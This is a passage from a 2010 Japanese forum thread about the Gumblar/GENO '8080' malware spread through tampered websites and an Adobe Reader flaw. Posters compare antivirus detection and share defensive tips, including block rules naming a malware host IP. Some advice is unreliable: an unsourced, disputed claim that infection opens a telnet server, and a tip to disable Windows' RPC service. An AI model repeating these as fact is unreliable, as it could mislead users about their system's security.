226: メスピペット(東日本)
10/01/08 17:49:07.25 ckOb/0qK
>>1
対応始まったな

午前1時52分の>>1のサイト /*LGPL*/有り
URLリンク(www.virustotal.com)
対応済み:Avira カスペ NOD32

227: 蛍光ペン(長屋)
10/01/08 17:53:55.57 YDMEhqGi
まさにGPL汚染
スクリプトを使って全てのライセンスをGPLにするつもりだな。

228: ダーマトグラフ(中国地方)
10/01/08 17:55:46.15 OXry08/R

いいえ 男女兼用です


229: モンキーレンチ(catv?)
10/01/08 18:03:14.23 HTtcnhM9
CVE-2009-4324

VRT: Adobe Reader media.newPlayer() Analysis (CVE-2009-4324)
URLリンク(vrt-sourcefire.blogspot.com)

extraexploit: Adobe CVE-2009-4324 in the wild - (0day) - part 0-6
URLリンク(extraexploit.blogspot.com)

230: ガスクロマトグラフィー(埼玉県)
10/01/08 18:06:51.82 3AS7Uh7K
Aviraありがたい

231: モンキーレンチ(catv?)
10/01/08 18:09:59.36 J0rbXE/p
>>226>>230
AviraってFREEもオケー?


232: 蛍光ペン(長屋)
10/01/08 18:10:36.07 YDMEhqGi
>>231
FREEはノー

233: ろうと台(東京都)
10/01/08 18:12:26.65 OKdC0Q0g

今PC買おうと思ってる奴、今は買うな!時期が悪い123
スレリンク(pc板)

234: メスピペット(東日本)
10/01/08 18:13:05.37 ckOb/0qK
>>231
うちのFREEで検知した

235: メスピペット(東日本)
10/01/08 18:15:27.46 ckOb/0qK
ただ既に>>1のサイトは感染に気づいて修正した模様

236: すりこぎ(アラバマ州)
10/01/08 18:19:11.43 TE0AHxjQ
ドクター中松のサイトが新種に感染ってマジ?

237: おろし金(中部地方)
10/01/08 18:32:05.66 ljvBIV7x
宝箱が>>146で一杯になっちまった

238: ファイル(神奈川県)
10/01/08 18:39:20.67 0N1RPMCW
>>236
まじ
でも今は修正されてる

239: 時計皿(神奈川県)
10/01/08 18:42:35.89 h1Nohgr4
なに、ガンプラの話をしにきた俺は帰ったほうがいいの?

240: 手枷(静岡県)
10/01/08 18:43:06.16 mDUjRL0s
HGUCガンブラスター (´・д・`)マダー?

241: 振り子(千葉県)
10/01/08 18:44:29.56 H2r5hTuo
一応行っておくけど今回のはUAC有効でも危ないからな
気をつけろよ

242: 真空ポンプ(愛知県)
10/01/08 18:51:56.42 XrN2qS1/
警告音まじ心臓に悪すぎ・・・

243: 金槌(茨城県)
10/01/08 18:53:38.32 TJ0kbOS4
何かこのスレでAviraが反応するんだけど
モッフルのサイト踏んでJava起動しちゃってたけど大丈夫かな

244: そろばん(catv?)
10/01/08 18:57:29.32 5Zpgb1R+
ガンブラーに感染してるかどうかって
どうやってわかるの?

245: 薬さじ(catv?)
10/01/08 18:57:38.44 2RR2xXkm
まだだ!たかがメインPCをやられただけだ!

246: ウィンナー巻き(アラバマ州)
10/01/08 19:00:10.80 OzZuWk66
最近多すぎる
2ちゃん以外閲覧しない方がいいな
貼られたリンクも踏まない

247: 冷却管(広島県)
10/01/08 19:01:48.41 qrGub+6x
GENOって感染したらどうなんの?

248: モンキーレンチ(大阪府)
10/01/08 19:07:13.20 xe588IAe
今回の8080系に感染するとtelnetサーバー立てられてリモートからPCのなか丸裸
IDは全部盗まれ、ショッピングで入力したならクレカもヤバい、悪人にPC貸し出した状態

249: 冷却管(広島県)
10/01/08 19:09:36.85 qrGub+6x
リカバリインストールしたら駆除できる?

250: モンキーレンチ(大阪府)
10/01/08 19:11:22.44 xe588IAe
クリーンインストールなら「たぶん」大丈夫、絶対は無い
でもそれしか回復方法は無い

251: モンキーレンチ(catv?)
10/01/08 19:36:12.87 HTtcnhM9
>>248
ソース

252: モンキーレンチ(大阪府)
10/01/08 19:42:33.95 xe588IAe
>>251
【Gumblar/GENO】Web改竄ウイルス総合スレ【8080】
スレリンク(sec板:99番)

253: 鉋(東京都)
10/01/08 20:21:37.95 9oh1Ia5x
>>252
telnetなんて一言も出てないようだが?

254: るつぼ(神奈川県)
10/01/08 20:23:36.95 poAfmzpK
最近のウイルスは総合型だからね
感染経路も感染後の行動も複雑

255: モンキーレンチ(アラバマ州)
10/01/08 21:12:52.08 PO6/SsZN

カスペ、Avira、ノートン、マカフィー(GW)が新たに対応
URLリンク(www.virustotal.com)

256: 綴じ紐(茨城県)
10/01/08 21:36:59.62 T7myWTrZ
>>255
おれのDr.webが・・・

257: ガムテープ(コネチカット州)
10/01/08 21:38:40.98 SXJSdjmi
Operaなら感染しないって本当?

258: オーブン(東京都)
10/01/08 21:44:08.98 aq4gBrC6


URLリンク(blogs.yahoo.co.jp)

259: シャープペンシル(静岡県)
10/01/08 22:50:12.54 qyRql0/i
>>255
GWは事実上アヴィラだし

260: モンキーレンチ(アラバマ州)
10/01/08 23:11:18.46 PO6/SsZN
>>259
調べたらいつのまにかWebWasherが買収されてたのか

261: テープ(catv?)
10/01/08 23:18:54.74 cEc24PG4
                                 ,.へ
  ___                             ム  i
 「 ヒ_i〉                            ゝ 〈
 ト ノ                           iニ(()
 i  {              ____           |  ヽ
 i  i           /__,  , ‐-\           i   }
 |   i         /(●)   ( ● )\       {、  λ
 ト-┤.      /    (__人__)    \    ,ノ  ̄ ,!
 i   ゝ、_     |     ´ ̄`       | ,. '´ハ   ,!
. ヽ、    `` 、,__\              /" \  ヽ/
   \ノ ノ   ハ ̄r/:::r―--―/::7   ノ    /
       ヽ.      ヽ::〈; . '::. :' |::/   /   ,. "
        `ー 、    \ヽ::. ;:::|/     r'"
     / ̄二二二二二二二二二二二二二二二二ヽ
     | 答 |     M a c 大 勝 利       │|
     \_二二二二二二二二二二二二二二二二ノ

262: 土鍋(dion軍)
10/01/09 00:20:07.07 ycjMYHFr
>>146
ブラクラ登録しようとしたら対象をファイルに保存をクリックしちまった

263: はさみ(千葉県)
10/01/09 00:20:33.28 DM0nybdb
スレの勢いもやるきねーな

264: はさみ(千葉県)
10/01/09 00:21:13.98 DM0nybdb
誤爆した

265: 錐(神奈川県)
10/01/09 00:22:18.29 xbLk6A/z
デザイン改悪しないでMGナイチンゲール出せよ

266: じゃがいも(関西)
10/01/09 00:29:10.32 FPgPdrn5
やはり携帯最強

267: マイクロピペット(東日本)
10/01/09 01:12:53.25 j8fcVN5V
>>256
最新版
URLリンク(www.virustotal.com)

268: ロープ(茨城県)
10/01/09 03:05:07.44 AOe+tnV+
>>214
ウイルスの原因になってるアドビは潰れた方がいいと思うよ
ソフトは全部フリー化という方向で

269: 平天(熊本県)
10/01/09 03:09:15.18 H7DZhuri
>>268
我が家では、ずっと前から全てフリーだけど。

270: 鑢(東京都)
10/01/09 03:10:36.73 0Fd1Ky5b
>>268
冷静に考えたらwindows以外は無料ソフトだった

271: ロープ(茨城県)
10/01/09 03:14:28.85 AOe+tnV+
>>269
いや、アドビがさっさと潰れて公式にフリー化しろってこと
そうすりゃFirefoxみたいに早急なバグフィクスができるから

>>270
中国には「Windows大家族」というのがあってだな…

272: 鑢(東京都)
10/01/09 03:18:14.76 0Fd1Ky5b
>>271
それは知ってるがここは日本だしw

273: てこ(東日本)
10/01/09 06:03:41.89 UiWIjeBd
URLリンク(news.goo.ne.jp)
不正アクセス容疑で捜査=企業のHP改ざん-被害相談相次ぐ・警視庁
2010年1月8日(金)13:03

274: 土鍋(東京都)
10/01/09 09:44:50.83 SaUhvDnI
お前らいったいどこでウイルスについて学んだんだよ
教えt

275: ガラス管(沖縄県)
10/01/09 09:52:49.03 RbBZ7cW9 BE:2362133298-2BP(1167)
sssp://img.2ch.net/ico/syobo2.gif
>>274
朝から晩までPCの前で自宅警備してたら自然に覚えたよ

276: グラインダー(宮城県)
10/01/09 10:19:03.69 tBJfgGti
aviraの俺に隙はない

277: ドライバー(埼玉県)
10/01/09 10:34:32.77 qRdfl21h
とりあえずjavascript無効にしたadobe Readerを緊急リリースして
その後で対策版を出せばいいのに悠長だよね

278: 土鍋(東京都)
10/01/09 10:38:02.90 SaUhvDnI
>>275
どこからとっかかっていいか分からないんだけど

279: ガラス管(沖縄県)
10/01/09 11:02:50.26 RbBZ7cW9 BE:1837214887-2BP(1167)
sssp://img.2ch.net/ico/syobo2.gif
>>278
まず感染するだろ?
そしたら次は、何とか駆除しようと思って無駄な努力を繰り返すじゃん
そういう無駄な努力が積み重なって、気づいたら知識だけが残るんだよ(´・ω・`)

280: お玉(東京都)
10/01/09 11:09:03.21 FSzUW/4r
てすと

281: カッター(東京都)
10/01/09 11:12:48.88 kvrFg2bT
変なものをスレに張らないでくれよ。
このスレ開いたらGDATAさんがブロックして見られなかったぞ。

282: パステル(沖縄県)
10/01/09 11:17:38.19 58scfXCs
アンチvista厨のXP厨涙目wwwwwwwwwwwww

283: 鉤(dion軍)
10/01/09 11:19:15.64 8vRQup75
Windows7販促キャンペーンか

284: パステル(沖縄県)
10/01/09 11:20:30.39 58scfXCs
>>283
MSの陰謀だったのか

285: プリズム(大阪府)
10/01/09 11:20:31.26 5P7TjRPf
7はともかく7のα版は・・・

286: プライヤ(埼玉県)
10/01/09 11:21:06.62 6rqzUpu0
>>1
感染サイト?開いたけど何も反応しないじゃん。

287:刹那's☆ ◆SETSUNA2ArLs
10/01/09 11:21:52.29 WfjBT3Hr BE:298206432-S★(504700)
sssp://img.2ch.net/ico/u_sii_angel.gif
おい!avast!駄目なのか??(^_^;)。 ...!教えろν速民

288: クッキングヒーター(神奈川県)
10/01/09 11:25:08.52 wLTrRJWH
JavaScript使ってるPDFって見たことがないんだけど・・・

どんな感じなの

289: ペーパーナイフ(catv?)
10/01/09 11:31:00.62 Pbvc+upq
>>287
今騒がれてる分の8080系は対応済
亜種が出てくるまでの話だけど

URLリンク(www.virustotal.com)

290: 石綿金網(神奈川県)
10/01/09 11:32:03.33 rBs90n99
アンチウイルスは最後の砦ですよ

291:刹那's☆ ◆SETSUNA2ArLs
10/01/09 11:53:59.37 WfjBT3Hr BE:3131163397-S★(504700)
sssp://img.2ch.net/ico/u_sii_angel.gif
>>289
どうやって対処するんすか!?
どんなふうにしていいかわからない…けど、頑張れば(^ω^)((爆))です
さすがのν速民でも駄目なのかうぬ!過去Jane誤作動したよなavast氏は
過去もあるし様子みすね~な見解!とりまありがとでつ\(^O^)/@氏にはがばて
貰いたいでつ~

292: ペーパーナイフ(catv?)
10/01/09 12:05:08.35 Pbvc+upq
>>291
Avast!がうpだてされてれば、「今の段階の」8080はWebシールドが働いてブロックしてくれるけど、
↑に書いたように亜種が出るまでの話

対策:ブラウザをFireFoxにする

・FireFox:URLリンク(mozilla.jp)
・NoScript:URLリンク(addons.mozilla.jp)
・Adblock Plus:URLリンク(addons.mozilla.jp)

ツール→アドオン→Adblock Plusの設定を開いて
*/94.247.2.195/* ←コピペで追加。

これ+>>109で対応

スペックに余裕があるなら

PCをサンドボックス化、再起動ですべてを“なかったこと”にできる「Returnil」
URLリンク(www.forest.impress.co.jp)

それと綺麗な状態のうちに、丸ごとバックアップする手もあり

Windowsが起動したままの状態でハードディスクをまるごと
イメージ化できるフリーソフト「Macrium Reflect FREE Edition」
URLリンク(gigazine.net)

あとはセキュ板の関連スレをチェックしてみ?



293: 大根(アラビア)
10/01/09 12:06:51.26 xLTAcwf3
おい!アバストさんが騒いだぞ!

294: スターラー(アラバマ州)
10/01/09 12:09:26.27 HpBQ53ce

ケロロスレ?


295: ペーパーナイフ(catv?)
10/01/09 12:18:40.03 Pbvc+upq
>>293
>>23にスクリプトが貼られてるから=逆に考えればAvast!が有効ということ
(テキストだから悪さはしない 心配無用)

つかJaneのログフォルダは、Avast!に限らず除外設定にいれとこうな

296: 定規(アラバマ州)
10/01/09 12:20:06.27 RB2+OewL
てかavastはまだ対応されてないの?

297: 振り子(兵庫県)
10/01/09 12:22:11.81 OpBax4+Z
>>279
少し分かる俺は何なんだ?

298: ペーパーナイフ(catv?)
10/01/09 12:22:32.98 Pbvc+upq
>>296
>>289

出かけるんで後は各自で

299:刹那's☆ ◆SETSUNA2ArLs
10/01/09 12:25:06.23 WfjBT3Hr BE:1192824746-S★(504700)
sssp://img.2ch.net/ico/u_sii_angel.gif
>>292
ぽち丸ごとバックあぷします(つд`)ありがとぉ!!
URLリンク(mozilla.jp) +>>109よんでなぁするわ

300: ファイル(茨城県)
10/01/09 12:26:20.23 VifxWfUT
具体的に何するウイルスだよ
Web改竄されてて俺のPCに何する訳?

301: 定規(アラバマ州)
10/01/09 12:30:05.42 RB2+OewL
つかavastのオンアクセスの保護の設定って重いから全部普通にしてるんだけど、普通設定でも大丈夫かな?
高設定だと重いんだよね・・・

302: グラインダー(宮城県)
10/01/09 12:39:26.47 tBJfgGti
そもそもadobeのjavascriptって何してたの?

303: ばんじゅう(宮城県)
10/01/09 12:42:54.82 QGuff+j8
readerのjavascriptをOFFにしても、おれみたいにacrobatは忘れちゃってる
可能性があるからな、お前らも気をつけろよ

304: ミリペン(関西地方)
10/01/09 12:46:12.60 cEGswBFl
なぁ、俺の認識間違ってると思うんだが、情強のおまえらチェックしてくれ

俺が感染サイトを見る→俺が感染する→知らずに俺のサイトに俺がFTPでファイルうpする→勝手に改変コードを付け加えられる
→俺のサイトを見た人が感染

なの?
でもこれだとFTPのパスってもれてないよね

305: 巻き簀(大阪府)
10/01/09 12:47:24.27 uyvAvSWx
【レス抽出】
対象スレ:avast!のWebシールドでも反応しない新ガンブラーが登場
キーワード:ガンプラ


3 名前: ウケ(アラバマ州)[] 投稿日:2010/01/08(金) 02:45:14.02 ID:7h8EVcut
↓ガンプラかと思った

9 名前: ラベル(東京都)[] 投稿日:2010/01/08(金) 02:48:38.10 ID:1/1kKlEq
オススメのガンプラない?

239 名前: 時計皿(神奈川県)[sage] 投稿日:2010/01/08(金) 18:42:35.89 ID:h1Nohgr4
なに、ガンプラの話をしにきた俺は帰ったほうがいいの?




抽出レス数:3

306: スケッチブック(東京都)
10/01/09 12:52:43.82 iGD3z1KY
あぁ、何かしきりに21番と445番のポート叩いてくる奴らが居るなぁと思ったら、、、
こういうことか。面倒くさいなぁ

307: 定規(アラバマ州)
10/01/09 12:54:17.89 RB2+OewL
445番のポートってなんだっけ?

308: スケッチブック(東京都)
10/01/09 12:56:21.27 iGD3z1KY
>>307
windowsのファイルプリンタ共有サービスとか

309: 鉤(東京都)
10/01/09 12:56:43.65 ffobTXdn
MSE最強ってことか

310: 錘(東京都)
10/01/09 12:56:50.48 /4mbiOPn
AVAST!にファイルをトロイ扱いされて消されまくってからAVAST!恐くて使えない。
もう平気なのか?

311: ドライバー(長屋)
10/01/09 12:57:23.57 sSs+K87l BE:1194612285-PLT(12800)
sssp://img.2ch.net/ico/u_mosa.gif
>>305
いや。ガンプラの話でもいいと思う。

312: ガラス管(沖縄県)
10/01/09 12:57:31.86 RbBZ7cW9 BE:1476333959-2BP(1167)
sssp://img.2ch.net/ico/syobo2.gif
正直445はルータで閉じてもいい気がする

313: ドライバー(熊本県)
10/01/09 12:58:43.00 7iO+fC7T
ガンプラのスレじゃないのか・・・帰る

314: グラインダー(宮城県)
10/01/09 13:04:37.46 tBJfgGti
>>303
ソフトも関連付けられない男の人って・・

315: 絵具(関東地方)
10/01/09 13:10:07.79 IioKpeUH
>>310
いや今回の件で再導入したが、除外してなかったなんでもないファイルが消された、

316: ドライバー(長屋)
10/01/09 13:20:54.99 sSs+K87l BE:358384043-PLT(12800)
sssp://img.2ch.net/ico/u_mosa.gif
>>315
winRARのライセンス認証させるソフトがトロイ扱いされるんだが。

317: 錘(東京都)
10/01/09 13:23:02.36 /4mbiOPn
>>315>>316
あはは、まだトロイ扱いは直って無いのかw

318: ドライバー(長屋)
10/01/09 13:24:47.10 sSs+K87l BE:537575292-PLT(12800)
sssp://img.2ch.net/ico/u_mosa.gif
>>317
ちなみにCPRM解除のソフトもトロイ扱いされるので注意。

319: 蒸し器(愛知県)
10/01/09 13:25:58.90 32hhWZoY
avastは対応してないってスレ立てだよね
対応しているのはどれ?

320: 錐(関東・甲信越)
10/01/09 13:26:32.65 B+8hBSVN
・avast!用
webシールド→URLブロック
*:8080/*

・Adblock Plus用
|URLリンク(*:8080*)<)だと機能しない(後ろ側の / ←に注意)

上記は「http://~~:8080/~」
というURLを使ってくる限りずっと有効。

321: すりこぎ(山梨県)
10/01/09 13:30:37.13 GEWaBUZj
このスレを更新するたびに唸りをあげるavast!先生

322: 串(catv?)
10/01/09 13:37:06.18 2rTHWY7s
感染したらどうなるんだよ

323: プリズム(大阪府)
10/01/09 13:38:57.91 5P7TjRPf
それはもう大変なことに

324: クリップ(catv?)
10/01/09 13:43:29.37 m/dbXZL3
>>306>>320
危険ポートを閉じることでセキュリティを強化する。

【ポート135の役割】
Windows2000/XPは、標準で分散オブジェクト技術(以下:DCOM)を利用しています。
このDCOMを利用すると、他のPCのDCOMソフトを遠隔操作できます。
遠隔操作をする場合に、相手PCに問い合わせをする時のに使用するのがポート135です。
場合によっては、遠隔操作をされてしまう可能性があるものですので、このポートは停止しておきましょう。

ポート番号「135」、「リモート管理・操作等のサービスへのアクセス」
■ポート135を閉じる
「コントロールパネル」 -> 「管理ツール」 -> 「サービス」 -> 「Remote Procedure Call」を選択する。
「Remote Procedure Call (RPC) エンド ポイント マッパーや各種の RPC サービスを提供します。」
をダブルクリックし、プロパティを開く。
スタートアップの種類を「無効」にし、OKボタンをクリックしプロパティ画面を閉じる。
変更をしたらPCを再起動する。

ポート番号「445」、「ファイル共有等のサービスへのアクセス」
■ポート445を閉じる
「コントロールパネル」 ->「システム」 ->「ハードウェア」 ->「デバイスマネージャ」の「表示」メニューから
「非表示のデバイスドライバの表示」を選ぶと「プラグアンドプレイではないドライバ」という項目が一覧に加わる。
このツリーを展開して「NetBIOS over TCP/IP」のプロパティを開く。
ここで「ドライバ」タグを選択し、「スタートアップ」の種類を「無効」にする。
変更をしたらPCを再起動する。

ポート135 445
URLリンク(www.google.com)

325: ビュレット(茨城県)
10/01/09 15:07:08.29 ORo2ZECy
>>324
そんなことしなくたってルータ入れれば簡単に鉄壁のFWできるぜ

326: ボンベ(石川県)
10/01/09 15:13:25.96 5NbyV8Cq
いいかげんソフトウェアのアップデートはタスクで児童管理しろよ

327: ニッパ(関西地方)
10/01/09 15:15:53.13 IB0CF2iY
avastってなんかわかりずらい
AVGにしたらいい感じになった

328: ちくわ(dion軍)
10/01/09 15:27:23.55 sQLJ/tk2
>>326
通報した

329: ムーラン(群馬県)
10/01/09 15:30:59.43 WAu6bVgc
ガンブラスターだと

330: ムーラン(群馬県)
10/01/09 15:35:44.57 WAu6bVgc
信越放送ワロタww


最新レス表示
レスジャンプ
類似スレ一覧
スレッドの検索
話題のニュース
おまかせリスト
オプション
しおりを挟む
スレッドに書込
スレッドの一覧
暇つぶし2ch